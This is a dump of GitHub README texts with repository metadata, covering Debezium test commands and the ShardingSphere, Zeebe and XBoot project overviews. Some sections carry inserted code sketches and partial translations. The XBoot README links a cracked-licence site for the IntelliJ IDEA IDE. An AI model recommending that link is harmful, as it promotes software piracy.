To run the tests of PG connector using wal2json or pgoutput logical decoding plug-ins with a specific version of Apicurio, a test property can be passed as:
$ mvn clean install -pl debezium-connector-postgres -Pwal2json-decoder
-Ddebezium.test.apicurio.version=1.3.1.Final
In the absence of the property, the stable version of Apicurio will be fetched.
### Running tests of the Postgres connector against an external database, e.g. Amazon RDS
Please note that if you want to test against a *non-RDS* cluster, this test requires `` to be a superuser with not only the `replication` role but also permission
to log in to `all` databases in `pg_hba.conf`. It also requires the `postgis` packages to be available on the target server for some of the tests to pass.
$ mvn clean install -pl debezium-connector-postgres -Pwal2json-decoder \
-Ddocker.skip.build=true -Ddocker.skip.run=true -Dpostgres.host= \
-Dpostgres.user= -Dpostgres.password= \
-Ddebezium.test.records.waittime=10
Adjust the timeout value as needed.
See [PostgreSQL on Amazon RDS](debezium-connector-postgres/RDS.md) for details on setting up a database on RDS to test against.
### Running tests of the Oracle connector using Oracle XStream
$ mvn clean install -pl debezium-connector-oracle -Poracle-xstream,oracle-tests -Dinstantclient.dir=
### Running tests of the Oracle connector with a non-CDB database
$ mvn clean install -pl debezium-connector-oracle -Poracle-tests -Dinstantclient.dir= -Ddatabase.pdb.name=
### Running the tests for MongoDB with oplog capturing from an IDE
When running the tests without Maven, please make sure you pass the correct parameters to the execution. Look for the correct parameters in `.github/workflows/mongodb-oplog-workflow.yml` and
append them to the JVM execution parameters, prefixing them with `debezium.test`. As the execution happens outside of the Maven lifecycle, you need to start the MongoDB container manually
from the MongoDB connector directory:
$ mvn docker:start -B -am -Passembly -Dcheckstyle.skip=true -Dformat.skip=true -Drevapi.skip -Dcapture.mode=oplog -Dversion.mongo.server=3.6 -Dorg.slf4j.simpleLogger.log.org.apache.maven.cli.transfer.Slf4jMavenTransferListener=warn -Dmaven.wagon.http.pool=false -Dmaven.wagon.httpconnectionManager.ttlSeconds=120 -Dcapture.mode=oplog -Dmongo.server=3.6
The relevant portion of the line will look similar to the following:
java -ea -Ddebezium.test.capture.mode=oplog -Ddebezium.test.version.mongo.server=3.6 -Djava.awt.headless=true -Dconnector.mongodb.members.auto.discover=false -Dconnector.mongodb.name=mongo1 -DskipLongRunningTests=true [...]
## Contributing
The Debezium community welcomes anyone that wants to help out in any way, whether that includes reporting problems, helping with documentation, or contributing code changes to fix bugs, add tests, or implement new features. See [this document](CONTRIBUTE.md) for details.
A big thank you to all the Debezium contributors!
"
apache/shardingsphere,master,19423,6602,2016-01-18T12:49:26Z,633877,997,"Distributed SQL transaction & query engine for data sharding, scaling, encryption, and more - on any database.",bigdata database database-cluster database-plus dba distributed-database distributed-sql-database distributed-transactions encrypt hacktoberfest mysql oltp postgresql rdbms shard sql,"## [Distributed SQL transaction & query engine for data sharding, scaling, encryption, and more - on any database.](https://shardingsphere.apache.org/)
**Official Website:** [https://shardingsphere.apache.org/](https://shardingsphere.apache.org/)
[![GitHub Release](https://img.shields.io/github/release/apache/shardingsphere.svg)](https://github.com/apache/shardingsphere/releases)
[![Lines of Code](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=ncloc)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)
[![codecov](https://codecov.io/gh/apache/shardingsphere/branch/master/graph/badge.svg)](https://codecov.io/gh/apache/shardingsphere)
[![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/5394/badge)](https://bestpractices.coreinfrastructure.org/projects/5394)
[![Slack](https://img.shields.io/badge/%20Slack-ShardingSphere%20Channel-blueviolet)](https://join.slack.com/t/apacheshardingsphere/shared_invite/zt-sbdde7ie-SjDqo9~I4rYcR18bq0SYTg)
[![Gitter](https://badges.gitter.im/shardingsphere/shardingsphere.svg)](https://gitter.im/shardingsphere/Lobby)
[![Twitter](https://img.shields.io/twitter/url/https/twitter.com/ShardingSphere.svg?style=social&label=Follow%20%40ShardingSphere)](https://twitter.com/ShardingSphere)
| **Stargazers Over Time** | **Contributors Over Time** |
|:---------------------------------------------------------------------------------------------------------------------:|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|
| [![Stargazers Over Time](https://starchart.cc/apache/shardingsphere.svg)](https://starchart.cc/apache/shardingsphere) | [![Contributor over time](https://contributor-graph-api.apiseven.com/contributors-svg?chart=contributorOverTime&repo=apache/shardingsphere)](https://www.apiseven.com/en/contributor-graph?chart=contributorOverTime&repo=apache/shardingsphere) |
### OVERVIEW
Apache ShardingSphere is a distributed SQL transaction & query engine that allows for data sharding, scaling, encryption, and more - on any database. Our community's guiding development concept is Database Plus for creating a complete ecosystem that allows you to transform any database into a distributed database system.
It focuses on repurposing existing databases, by placing a standardized upper layer above existing and fragmented databases, rather than creating a new database.
The goal is to provide unified database services and minimize or eliminate the challenges caused by underlying databases' fragmentation.
This results in applications only needing to communicate with a single standardized service.
The concepts at the core of the project are `Connect`, `Enhance` and `Pluggable`.
- `Connect:` Flexible adaptation of database protocol, SQL dialect and database storage. It can quickly connect applications and heterogeneous databases.
- `Enhance:` Capture the database access entry point to transparently provide additional features, such as: redirect (sharding, read/write splitting and shadow), transform (data encryption and masking), authentication (security, audit and authority), and governance (circuit breaker, access limitation, analysis, QoS and observability).
- `Pluggable:` Leveraging the micro-kernel and three-layer pluggable model, features and the database ecosystem can be embedded flexibly. Developers can customize their ShardingSphere just like building with LEGO blocks.
ShardingSphere became an [Apache](https://apache.org/index.html#projects-list) Top-Level Project on April 16, 2020.
So far, ShardingSphere has been used by over [10,000 projects on GitHub](https://github.com/search?l=Maven+POM&q=shardingsphere+language%3A%22Maven+POM%22&type=Code).
### DOCUMENTATION📜
[![EN doc](https://img.shields.io/badge/document-English-blue.svg)](https://shardingsphere.apache.org/document/current/en/overview/)
[![CN doc](https://img.shields.io/badge/文档-中文版-blue.svg)](https://shardingsphere.apache.org/document/current/cn/overview/)
For full documentation & more details, visit: [Docs](https://shardingsphere.apache.org/document/current/en/overview/)
### CONTRIBUTION🚀🧑💻
For guides on how to get started and setup your environment, contributor & committer guides, visit: [Contribution Guidelines](https://shardingsphere.apache.org/community/en/involved/)
### Team
We deeply appreciate [community contributors](https://shardingsphere.apache.org/community/en/team) for their dedication to Apache ShardingSphere.
##
### COMMUNITY & SUPPORT💝🖤
:link: [Mailing List](https://shardingsphere.apache.org/community/en/involved/subscribe/). Best for: Apache community updates, releases, changes.
:link: [GitHub Issues](https://github.com/apache/shardingsphere/issues). Best for: larger systemic questions/bug reports or anything development related.
:link: [GitHub Discussions](https://github.com/apache/shardingsphere/discussions). Best for: technical questions & support, requesting new features, proposing new features.
:link: [Slack channel](https://join.slack.com/t/apacheshardingsphere/shared_invite/zt-sbdde7ie-SjDqo9~I4rYcR18bq0SYTg). Best for: instant communications and online meetings, sharing your applications.
:link: [Twitter](https://twitter.com/ShardingSphere). Best for: keeping up to date on everything ShardingSphere.
:link: [LinkedIn](https://www.linkedin.com/showcase/apache-shardingsphere/e). Best for: professional networking and career development with other ShardingSphere contributors.
##
### STATUS👀
:white_check_mark: Version 5.4.1: released :tada:
🔗 For the release notes, follow this link to the relevant [GitHub page](https://github.com/apache/shardingsphere/blob/master/RELEASE-NOTES.md).
:soon: Version 5.4.2
We are currently working towards our 5.4.2 milestone.
Keep an eye on the [milestones page](https://github.com/apache/shardingsphere/milestones) of this repo to stay up to date.
[comment]: <> (##)
[comment]: <> (### NIGHTLY BUILDS:)
[comment]: <> ()
[comment]: <> (A nightly build of ShardingSphere from the latest master branch is available. )
[comment]: <> (The package is updated daily and is available [here](http://117.48.121.24:8080).)
[comment]: <> (##)
[comment]: <> (**‼️ Notice:**)
[comment]: <> ()
[comment]: <> (Use this nightly build at your own risk! )
[comment]: <> (The branch is not always fully tested. )
[comment]: <> (The nightly build may contain bugs, and there may be new features added which may cause problems with your environment. )
##
### How it Works
Apache ShardingSphere includes 2 independent products: JDBC & Proxy.
Both provide capabilities for data scale-out, distributed transactions and distributed governance, applicable in a variety of situations such as Java-homogeneous stacks, heterogeneous languages and cloud-native environments.
### ShardingSphere-JDBC
[![Maven Status](https://img.shields.io/maven-central/v/org.apache.shardingsphere/shardingsphere-jdbc.svg?color=green)](https://mvnrepository.com/artifact/org.apache.shardingsphere/shardingsphere-jdbc)
A lightweight Java framework providing extra services at the Java JDBC layer.
With the client end connecting directly to the database, it provides services in the form of a jar and requires no extra deployment or dependencies.
:link: For more details, follow this [link to the official website](https://shardingsphere.apache.org/document/current/en/overview/#shardingsphere-jdbc).
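A minimal, hedged sketch of what this looks like in application code, assuming ShardingSphere-JDBC 5.x with rules defined in a YAML file (the file name and the `t_order` table below are illustrative only, not taken from this README):
```java
import org.apache.shardingsphere.driver.api.yaml.YamlShardingSphereDataSourceFactory;

import javax.sql.DataSource;
import java.io.File;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;

public class ShardingJdbcSketch {
    public static void main(String[] args) throws Exception {
        // Sharding / read-write-splitting rules are described in YAML.
        DataSource dataSource =
                YamlShardingSphereDataSourceFactory.createDataSource(new File("shardingsphere.yaml"));

        // Plain JDBC from here on; routing to the physical shards is transparent.
        try (Connection conn = dataSource.getConnection();
             PreparedStatement ps = conn.prepareStatement("SELECT order_id FROM t_order WHERE user_id = ?")) {
            ps.setLong(1, 10L);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    System.out.println(rs.getLong("order_id"));
                }
            }
        }
    }
}
```
Because only standard JDBC is involved, the same application code works whether it is pointed at a single database or a sharded cluster.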
### ShardingSphere-Proxy
[![Nightly-Download](https://img.shields.io/static/v1?label=nightly-builds&message=download&color=orange)](https://nightlies.apache.org/shardingsphere/)
[![Download](https://img.shields.io/badge/release-download-orange.svg)](https://www.apache.org/dyn/closer.lua/shardingsphere/5.3.2/apache-shardingsphere-5.3.2-shardingsphere-proxy-bin.tar.gz)
[![Docker Pulls](https://img.shields.io/docker/pulls/apache/shardingsphere-proxy.svg)](https://store.docker.com/community/images/apache/shardingsphere-proxy)
A transparent database proxy, providing a database server that encapsulates the database binary protocol to support heterogeneous languages.
Friendlier to DBAs, the MySQL and PostgreSQL versions provided can be used with any kind of terminal or client.
:link: For more details, follow this [link to the official website](https://shardingsphere.apache.org/document/current/en/overview/#shardingsphere-proxy).
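Because the proxy encapsulates the database binary protocol, any standard client or driver can talk to it directly. A small, hedged sketch using the plain MySQL JDBC driver (the port 3307, logical schema name, and credentials are assumptions typical of a local proxy setup, not taken from this README):
```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class ProxyConnectionSketch {
    public static void main(String[] args) throws Exception {
        // The proxy looks like an ordinary MySQL server to the client.
        try (Connection conn = DriverManager.getConnection(
                "jdbc:mysql://127.0.0.1:3307/sharding_db", "root", "root");
             Statement stmt = conn.createStatement();
             ResultSet rs = stmt.executeQuery("SELECT 1")) {
            while (rs.next()) {
                System.out.println(rs.getInt(1));
            }
        }
    }
}
```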
### Hybrid Architecture
ShardingSphere-JDBC adopts a decentralized architecture, applicable to high-performance light-weight OLTP applications developed with Java.
ShardingSphere-Proxy provides a static entry point and support for all languages, making it suitable for OLAP applications and for the management and operation of sharded databases.
By combining ShardingSphere-JDBC and ShardingSphere-Proxy with a unified sharding strategy through the same registry center, the ShardingSphere ecosystem can build an application system suitable for all kinds of scenarios.
:link: More details can be found following this [link to the official website](https://shardingsphere.apache.org/document/current/en/overview/#hybrid-architecture).
##
### Solution
| *Solutions/Features* | *Distributed Database* | *Data Security* | *Database Gateway* | *Stress Testing* |
|----------------------|-------------------------|----------------------|-----------------------------------|------------------|
| | Data Sharding | Data Encryption | Heterogeneous Databases Supported | Shadow Database |
| | Read/write Splitting | Row Authority (TODO) | SQL Dialect Translate (TODO) | Observability |
| | Distributed Transaction | SQL Audit (TODO) | | |
| | Elastic Scale-out | SQL Firewall (TODO) | | |
| | High Availability | | | |
##
### Roadmap
![Roadmap](https://shardingsphere.apache.org/document/current/img/roadmap_en.png)
##
### How to Build Apache ShardingSphere
Check out [Wiki](https://github.com/apache/shardingsphere/wiki) section for details on how to build Apache ShardingSphere and a full guide on how to get started and setup your local dev environment.
##
### Landscapes
##
"
camunda/zeebe,main,3023,545,2016-03-20T03:38:04Z,252027,720,Distributed Workflow Engine for Microservices Orchestration,bpmn golang grpc hacktoberfest java microservices orchestration-framework workflow workflow-engine,"# Zeebe - Workflow Engine for Microservices Orchestration
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.camunda.zeebe/camunda-zeebe/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.camunda.zeebe/camunda-zeebe)
Zeebe provides visibility into and control over business processes that span multiple microservices. It is the engine that powers [Camunda Platform 8](https://camunda.com/platform/zeebe/).
**Why Zeebe?**
* Define processes visually in [BPMN 2.0](https://www.omg.org/spec/BPMN/2.0.2/)
* Choose your programming language
* Deploy with [Docker](https://www.docker.com/) and [Kubernetes](https://kubernetes.io/)
* Build processes that react to messages from [Kafka](https://kafka.apache.org/) and other message queues
* Scale horizontally to handle very high throughput
* Fault tolerance (no relational database required)
* Export process data for monitoring and analysis
* Engage with an active community
[Learn more at camunda.com](https://camunda.com/platform/zeebe/)
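As a quick, hedged illustration of the client-side programming model (not an official snippet from this README; the gateway address, BPMN resource name, and process id are assumptions), deploying and starting a process with the Java client might look like this:
```java
import io.camunda.zeebe.client.ZeebeClient;

public class ZeebeClientSketch {
    public static void main(String[] args) {
        // Illustrative local gateway settings; adjust for your cluster.
        try (ZeebeClient client = ZeebeClient.newClientBuilder()
                .gatewayAddress("localhost:26500")
                .usePlaintext()
                .build()) {
            // Deploy a BPMN model, then start one instance of it.
            client.newDeployResourceCommand()
                    .addResourceFromClasspath("order-process.bpmn")
                    .send()
                    .join();
            client.newCreateInstanceCommand()
                    .bpmnProcessId("order-process")
                    .latestVersion()
                    .send()
                    .join();
        }
    }
}
```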
## Release Lifecycle
Our release cadence within major releases is a minor release every six months, with an alpha release on each of the five months between minor releases. Releases happen on the second Tuesday of the month, Berlin time (CET).
Minor releases are supported with patches for eighteen months after their release.
Here is a diagram illustrating the lifecycle of minor releases over a 27-month period:
```
2022 2023 2024
Ap Ma Ju Ju Au Se Oc No De Ja Fe Ma Ap Ma Ju Ju Au Se Oc No De Ja Fe Ma Ap Ma Ju
8.0--------------------------------------------------|
8.1--------------------------------------------------|
8.2-----------------------------------------
8.3-----------------------
8.4-----
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
```
Here is a diagram illustrating the release schedule of the five alpha releases prior to an upcoming minor release over a 7-month period:
```
2022 2023
Oct Nov Dec Jan Feb Mar Apr
8.1-----------------------------------------------------------------------------
8.2-alpha1 8.2-alpha2 8.2-alpha3 8.2-alpha4 8.2-alpha5 8.2--
1 2 3 4 5 6 7
```
## Status
To learn more about what we're currently working on, check the [GitHub issues](https://github.com/camunda/zeebe/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc) and the [latest commits](https://github.com/camunda/zeebe/commits/main).
## Helpful Links
* [Releases](https://github.com/camunda/zeebe/releases)
* [Pre-built Docker images](https://hub.docker.com/r/camunda/zeebe/tags?page=1&ordering=last_updated)
* [Building Docker images for other platforms](/zeebe/docs/building_docker_images.md)
* [Blog](https://camunda.com/blog/category/process-automation-as-a-service/)
* [Documentation Home](https://docs.camunda.io)
* [Issue Tracker](https://github.com/camunda/zeebe/issues)
* [User Forum](https://forum.camunda.io)
* [Slack Channel](https://www.camunda.com/slack)
* [Contribution Guidelines](/CONTRIBUTING.md)
## Recommended Docs Entries for New Users
* [What is Camunda Platform 8?](https://docs.camunda.io/docs/components/concepts/what-is-camunda-platform-8/)
* [Getting Started Tutorial](https://docs.camunda.io/docs/guides/)
* [Technical Concepts](https://docs.camunda.io/docs/components/zeebe/technical-concepts/)
* [BPMN Processes](https://docs.camunda.io/docs/components/modeler/bpmn/bpmn-primer/)
* [Installation and Configuration](https://docs.camunda.io/docs/self-managed/zeebe-deployment/)
* [Java Client](https://docs.camunda.io/docs/apis-clients/java-client/)
* [Go Client](https://docs.camunda.io/docs/apis-clients/go-client/)
* [Spring Integration](https://github.com/camunda-community-hub/spring-zeebe/)
## Contributing
Read the [Contributions Guide](/CONTRIBUTING.md).
## Code of Conduct
This project adheres to the [Camunda Code of Conduct](https://camunda.com/events/code-conduct/).
By participating, you are expected to uphold this code. Please [report](https://camunda.com/events/code-conduct/reporting-violations/)
unacceptable behavior as soon as possible.
## License
Zeebe source files are made available under the [Zeebe Community License
Version 1.1](/licenses/ZEEBE-COMMUNITY-LICENSE-1.1.txt) except for the parts listed
below, which are made available under the [Apache License, Version
2.0](/licenses/APACHE-2.0.txt). See individual source files for details.
Available under the [Apache License, Version 2.0](/licenses/APACHE-2.0.txt):
- Java Client ([clients/java](/clients/java))
- Go Client ([clients/go](/clients/go))
- Exporter API ([exporter-api](/exporter-api))
- Protocol ([protocol](/protocol))
- Gateway Protocol Implementation ([gateway-protocol-impl](/gateway-protocol-impl))
- BPMN Model API ([bpmn-model](/bpmn-model))
### Clarification on gRPC Code Generation
The Zeebe Gateway Protocol (API) as published in the
[gateway-protocol](/gateway-protocol/src/main/proto/gateway.proto) is licensed
under the [Zeebe Community License 1.1](/licenses/ZEEBE-COMMUNITY-LICENSE-1.1.txt). Using gRPC tooling to generate stubs for
the protocol does not constitute creating a derivative work under the Zeebe Community License 1.1 and no licensing restrictions are imposed on the
resulting stub code by the Zeebe Community License 1.1.
"
Exrick/xboot,master,3779,1298,2018-04-23T14:44:18Z,5309,11,基于Spring Boot 2.x的一站式前后端分离快速开发平台XBoot 微信小程序+Uniapp 前端:Vue+iView Admin 后端:Spring Boot 2.x/Spring Security/JWT/JPA+Mybatis-Plus/Redis/Elasticsearch/Activiti 分布式限流/同步锁/验证码/SnowFlake雪花算法ID 动态权限 数据权限 工作流 代码生成 定时任务 社交账号 短信登录 单点登录 OAuth2开放平台 客服机器人 数据大屏 暗黑模式,activiti admin dark-mode dashboard elasticsearch iview jpa jwt mybatis-plus mysql oauth2 quartz redis spring-boot spring-security uniapp vue wechat-app xboot,"# XBoot
[![AUR](https://img.shields.io/badge/GPL-v3-red)](https://github.com/Exrick/xmall/blob/master/License)
[![](https://img.shields.io/badge/Author-Exrick-orange.svg)](http://blog.exrick.cn)
[![](https://img.shields.io/badge/version-3.3.4-brightgreen.svg)](https://github.com/Exrick/x-boot)
[![GitHub stars](https://img.shields.io/github/stars/Exrick/x-boot.svg?style=social&label=Stars)](https://github.com/Exrick/x-boot)
[![GitHub forks](https://img.shields.io/github/forks/Exrick/x-boot.svg?style=social&label=Fork)](https://github.com/Exrick/x-boot)
### 宣传视频
- [作者亲自制作XBoot文字快闪宣传视频](http://www.bilibili.com/av30284667)
- [作者亲自制作其他项目宣传视频](https://www.bilibili.com/video/av23121122/)
### 宣传官网
- 官网地址:http://xb.exrick.cn
- 官网源码:https://github.com/Exrick/xboot-show
### 在线Demo
- 在线Demo:http://xboot.exrick.cn
- 单点登录测试页:http://sso.exrick.cn
- 统一认证平台访问地址:http://xboot.exrick.cn/authorize
### 最新最全面在线文档
https://www.kancloud.cn/exrick/xboot/content
### 前台基于Vue+iView项目地址: [xboot-front](https://github.com/Exrick/xboot-front)
### Version notes
- xboot-fast: single-application version
- xboot-module: multi-module version
### Project overview
- [x] Thoroughly commented code with no convoluted logic; the core uses Spring Boot 2.4.8
- [x] JWT / Redis-based token handling with configurable single-device login, switchable at will; provides an open platform and OAuth2 authentication center, with single sign-on support
- [x] JPA + Mybatis-Plus, switchable at will
- [x] Operation logs can be recorded in either MySQL or Elasticsearch, switchable at will
- [x] Java, Vue and SQL code generation that quadruples development efficiency
- [x] Dynamic permission management, easy multi-dimensional control of permission button visibility, and data-level permission management
- [x] Supports login via social accounts, SMS and other methods without touching the original user data, implementing third-party account management
- [x] Websocket-based message push management, Quartz-based scheduled task management, and data dictionary management
- [x] The back end provides utility classes for distributed rate limiting, synchronization locks, captchas, etc.; the front end provides rich Vue templates
- [x] SMS, email, Vaptcha captcha and more can be configured dynamically
- [x] Why separate the front end and the back end?
- In this day and age, are you still using jQuery?
![](https://ooo.0o0.ooo/2019/04/29/5cc70cac4b7a4.png)
### 截图预览
- PC
![QQ截图20180826163917.png](https://ooo.0o0.ooo/2021/07/01/t6RXqn8LeaY5Nu1.png)
![QQ截图20180826164058.png](https://ooo.0o0.ooo/2021/07/01/TQZqrxog4ufX2SR.png)
![QQ截图20180826164144.png](https://ooo.0o0.ooo/2021/07/01/t7RdWhkbzZCawce.png)
- iPad Mini 5
- iPhone X
### [完整版截图细节展示](https://github.com/Exrick/x-boot/wiki/%E5%AE%8C%E6%95%B4%E7%89%88%E6%88%AA%E5%9B%BE%E7%BB%86%E8%8A%82%E5%B1%95%E7%A4%BA)
### 系统架构
### 前端所用技术
- Vue 2.6.x、Vue Cli 4.x、iView、iview-admin、iview-area、Vuex、Vue Router、ES6、webpack、axios、echarts、cookie等
- 前台为基于Vue+iView的独立项目请跳转至 [xboot-front](https://github.com/Exrick/xboot-front) 项目仓库查看
### 后端所用技术
##### 各框架依赖版本皆使用目前最新版本
- Spring Boot
- SpringMVC
- Spring Security
- [Spring Data JPA](https://docs.spring.io/spring-data/jpa/docs/2.2.2.RELEASE/reference/html/)
- [MyBatis-Plus](http://mp.baomidou.com):已更新至3.x版本
- [Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md)
- [Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md):基于Lucene分布式搜索引擎
- [Druid](http://druid.io/):阿里高性能数据库连接池(偏监控 注重性能可使用默认HikariCP) [Druid配置官方中文文档](https://github.com/alibaba/druid/tree/master/druid-spring-boot-starter)
- [Json Web Token(JWT)](https://jwt.io/)
- [Quartz](http://www.quartz-scheduler.org):定时任务
- [Beetl](http://ibeetl.com/guide/#beetl):模版引擎 代码生成使用
- [Thymeleaf](https://www.thymeleaf.org/):发送模版邮件使用
- [Hutool](http://hutool.mydoc.io/):Java工具包
- [Jasypt](https://github.com/ulisesbocchio/jasypt-spring-boot):配置文件加密(thymeleaf作者开发)
- [Swagger2](https://github.com/Exrick/xmall/blob/master/study/Swagger2.md):Api文档生成
- MySQL
- [Nginx](https://github.com/Exrick/xmall/blob/master/study/Nginx.md)
- [Maven](https://github.com/Exrick/xmall/blob/master/study/Maven.md)
- 第三方SDK或服务
- [七牛云文件存储服务](https://developer.qiniu.com/kodo/sdk/1239/java)
- [腾讯位置服务](https://lbs.qq.com/webservice_v1/guide-ip.html):需申请填入key后免费使用
- 完整版
- [Vaptcha人机验证码](https://www.vaptcha.com/)
- [阿里云短信服务](https://dysms.console.aliyun.com)
- 其它开发工具
- [Lombok](https://projectlombok.org/)
- [JRebel](https://github.com/Exrick/xmall/blob/master/study/JRebel.md):开发秒级热部署
- [阿里JAVA开发规约插件](https://github.com/alibaba/p3c)
### 最新最全面在线文档
> 第一时间更新,文档永不收费
https://www.kancloud.cn/exrick/xboot/content
### Running and deploying locally
- Install and start the dependencies: [Redis](https://github.com/Exrick/xmall/blob/master/study/Redis.md), [Elasticsearch](https://github.com/Exrick/xmall/blob/master/study/Elasticsearch.md) (only needed when the configuration uses ES to record logs)
- [Install Maven and configure it in IDEA](https://github.com/Exrick/xmall/blob/master/study/Maven.md)
- IDEA is recommended ([crack/free registration](http://idea.lanyus.com/)); install the `Lombok` plugin, then import this Maven project. If the dependencies are not downloaded automatically, run `mvn install` in the project root
- Create an `xboot` database in MySQL. The configuration enables DDL auto-generation of the table structure but contains no initial data, so remember to import the xboot.sql file (if errors about missing Quartz tables appear, set the database to ignore case or additionally re-import quartz.sql)
- Adjust the relevant settings in the `application.yml` configuration file; it is thoroughly commented, and all configuration is changed only there
- Start `XbootApplication.java` from the IDE or run `mvn spring-boot:run` in the project root. The default port is 8888; if the API docs at `http://localhost:8888/doc.html` are reachable, startup succeeded. Admin credentials: admin|123456
- For the front-end pages, start the Vue-based [xboot-front](https://github.com/Exrick/xboot-front) project and adjust its API proxy configuration
> Tip: if errors appear after updating the code, remember to update the SQL and clear the Redis cache
### 开发指南及相关技术栈文档
- [项目基本配置和使用相关技术栈文档【必读】](https://github.com/Exrick/x-boot/wiki/%E9%A1%B9%E7%9B%AE%E5%9F%BA%E6%9C%AC%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8%E7%9B%B8%E5%85%B3%E6%8A%80%E6%9C%AF%E6%A0%88%E6%96%87%E6%A1%A3%E3%80%90%E5%BF%85%E8%AF%BB%E3%80%91)
- [如何使用XBoot后端在30秒内开发出增删改接口](https://github.com/Exrick/x-boot/wiki/%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8XBoot%E5%90%8E%E7%AB%AF%E5%9C%A830%E7%A7%92%E5%86%85%E5%BC%80%E5%8F%91%E5%87%BA%E5%A2%9E%E5%88%A0%E6%94%B9%E6%8E%A5%E5%8F%A3)
- [具体XBoot增删改文档示例](https://github.com/Exrick/x-boot/wiki/CRUD)
- 完整版
- [第三方社交账号登录配置](https://github.com/Exrick/x-boot/wiki/%E7%AC%AC%E4%B8%89%E6%96%B9%E7%A4%BE%E4%BA%A4%E8%B4%A6%E5%8F%B7%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE)
- [短信登录配置](https://github.com/Exrick/x-boot/wiki/%E7%9F%AD%E4%BF%A1%E7%99%BB%E5%BD%95%E9%85%8D%E7%BD%AE)
- [Vaptcha人机验证码配置使用](https://github.com/Exrick/x-boot/wiki/vaptcha%E4%BA%BA%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E9%85%8D%E7%BD%AE%E4%BD%BF%E7%94%A8)
- [Activiti工作流开发说明](https://github.com/Exrick/x-boot/wiki/Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E5%BC%80%E5%8F%91%E8%AF%B4%E6%98%8E)
### [分布式扩展](https://github.com/alibaba/dubbo-spring-boot-starter/blob/master/README_zh.md)
### XBoot后端学习分享(更新中)
1. [Spring Boot 2.x 区别总结](https://github.com/Exrick/x-boot/wiki/SpringBoot2.x%E5%8C%BA%E5%88%AB%E6%80%BB%E7%BB%93)
2. [Spring Security整合JWT](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E6%95%B4%E5%90%88JWT)
3. [Spring Security实现动态数据库权限管理](https://github.com/Exrick/x-boot/wiki/SpringSecurity%E5%8A%A8%E6%80%81%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86)
4. [Spring Boot 2.x整合Quartz](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Quartz)
5. [基于Websocket实现发送消息后右上角消息图标红点实时显示](https://github.com/Exrick/x-boot/wiki/%E5%9F%BA%E4%BA%8EWebsocket%E5%AE%9E%E7%8E%B0%E5%8F%91%E9%80%81%E6%B6%88%E6%81%AF%E5%90%8E%E5%8F%B3%E4%B8%8A%E8%A7%92%E6%B6%88%E6%81%AF%E5%9B%BE%E6%A0%87%E7%BA%A2%E7%82%B9%E5%AE%9E%E6%97%B6%E6%98%BE%E7%A4%BA)
6. [Spring Boot 2.x整合Activiti工作流以及模型设计器](https://github.com/Exrick/x-boot/wiki/Spring-Boot-2.x%E6%95%B4%E5%90%88Activiti%E5%B7%A5%E4%BD%9C%E6%B5%81%E4%BB%A5%E5%8F%8A%E6%A8%A1%E5%9E%8B%E8%AE%BE%E8%AE%A1%E5%99%A8)
### Docker下后端集群部署(更新中)
> 前端集群部署请跳转至[xboot-front](https://github.com/Exrick/xboot-front)项目查看
1.[Docker的安装与常用命令](https://github.com/Exrick/x-boot/wiki/Docker%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4)
2.基于PXC架构Mysql数据库集群搭建
3.Redis集群搭建
4.Elasticsearch集群搭建
5.XBoot后端集群部署
### 商用授权
- 个人学习使用遵循GPL开源协议
- 商用需联系作者授权
### 作者其他项目推荐
- [XMall微信小程序APP前端 现已开源!](https://github.com/Exrick/xmall-weapp)
[![WX20190924-234416@2x.png](https://s2.ax1x.com/2019/10/06/ucEsBD.md.png)](https://www.bilibili.com/video/av70226175)
- [XMall:基于SOA架构的分布式电商购物商城](https://github.com/Exrick/xmall)
![](https://ooo.0o0.ooo/2018/07/22/5b54615b95788.jpg)
- [XPay个人免签收款支付系统](https://github.com/Exrick/xpay)
- 机器学习笔记
- [Machine-Learning](https://github.com/Exrick/Machine-Learning)
### 技术疑问交流
- QQ交流群 `475743731(付费)`,可获取各项目详细图文文档、疑问解答 [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=7b60cec12ba93ebed7568b0a63f22e6e034c0d1df33125ac43ed753342ec6ce7)
- 免费交流群 `562962309` [![](http://pub.idqqimg.com/wpa/images/group.png)](http://shang.qq.com/wpa/qunwpa?idkey=52f6003e230b26addeed0ba6cf343fcf3ba5d97829d17f5b8fa5b151dba7e842)
- 作者博客:[http://blog.exrick.cn](http://blog.exrick.cn)
### [捐赠](http://xpay.exrick.cn/pay)"
